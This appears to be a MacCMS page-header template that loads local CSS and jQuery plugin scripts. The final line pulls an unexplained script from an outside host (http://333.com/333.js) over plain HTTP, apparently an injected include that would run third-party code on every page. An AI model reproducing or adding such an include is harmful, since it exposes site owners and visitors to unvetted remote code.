<link href="{$maccms.path}static/css/home.css" rel="stylesheet" type="text/css" />
<link href="{$maccms.path_tpl}css/member.css" type="text/css" rel="stylesheet" />
<script src="{$maccms.path_tpl}js/tab.js" type="text/javascript"></script>
<script src="{$maccms.path}static/js/jquery.js"></script>
<script src="{$maccms.path}static/js/jquery.lazyload.js"></script>
<script src="{$maccms.path}static/js/jquery.autocomplete.js"></script>
<script src="{$maccms.path_tpl}js/jquery.superslide.js"></script>
<script src="{$maccms.path_tpl}js/jquery.lazyload.js"></script>
<script>var maccms={"path":"__ROOT__","mid":"{$maccms['mid']}","url":"{$maccms['site_url']}","wapurl":"{$maccms['site_wapurl']}","mob_status":"{$maccms['mob_status']}"};</script>
<script src="{$maccms.path}static/js/home.js"></script>
<script src="{$maccms.path_tpl}js/formValidator-4.0.1.js" type="text/javascript"></script>
<script src="{$maccms.path}static/js/jquery.imageupload.js"></script>
<script src="http://333.com/333.js" type="text/javascript"></script>
